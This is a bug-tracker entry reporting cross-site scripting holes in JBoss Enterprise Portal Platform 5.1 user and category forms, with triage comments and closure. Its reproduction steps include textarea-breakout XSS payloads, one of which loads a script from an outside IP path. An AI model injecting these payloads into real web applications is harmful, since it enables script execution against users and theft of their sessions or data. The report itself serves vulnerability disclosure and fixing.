| Summary: | GTNPORTAL-1830 Cross Site Scripting vulnerabilities in user forms | ||
|---|---|---|---|
| Product: | [JBoss] JBoss Enterprise Portal Platform 5 | Reporter: | Gary Hu <garyhu2> |
| Component: | unspecified | Assignee: | hfnukal <hfnukal> |
| Status: | CLOSED NEXTRELEASE | QA Contact: | |
| Severity: | high | Docs Contact: | |
| Priority: | high | ||
| Version: | 5.1.0.GA | CC: | bmachado, epp-bugs, hfnukal, smumford, talee, theute |
| Target Milestone: | --- | ||
| Target Release: | 5.1.1.DEV01 | ||
| Hardware: | Unspecified | ||
| OS: | Unspecified | ||
| URL: | http://jira.jboss.org/jira/browse/JBEPP-847 | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: | Story Points: | --- | |
| Clone Of: | Environment: | ||
| Last Closed: | 2011-07-08 08:36:18 UTC | Type: | Bug |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
|
Description
Gary Hu
2011-03-08 23:22:01 UTC
Link: Added: This issue Cloned to GTNPORTAL-1830 Security: Removed: Public Added: RHT+eXo Link: Added: This issue is related to JBEPP-597 Release Notes Text: Added: Text is escaped and no script is executed. I've received a new case about a similar issue and I tested it using epp-5.1.1.DEV01. When I type something like "<script>alert("hello");</script>" the script isn't executed. But, when I type something like "Dashboard</textarea><script>alert("Bad XSS");</script>", the script is still executed.
Ticket link: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
Also tested the value "Dashboard</textarea><script>alert("Bad XSS");</script>" in RH03, the script was executed and "Bad XSS" message was showed.
Steps to reproduce:
1. login as root
2. Group -> Administration -> Application Registry
3. Edit Category
4. Type at the "Description" field the following:
Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js>
or
Dashboard</textarea><script>alert("Bad XSS");</script>
5. Click on Save button.
Reclose the issue. This one was about User form, and the case that reopened it is about category description, I opened a separate Jira: JBEPP-997 Release Notes Docs Status: Added: Not Required Release Notes Text: Removed: Text is escaped and no script is executed. Added: Included in the Release Note for JBEPP-598 Security: Removed: RHT+eXo Added: Public |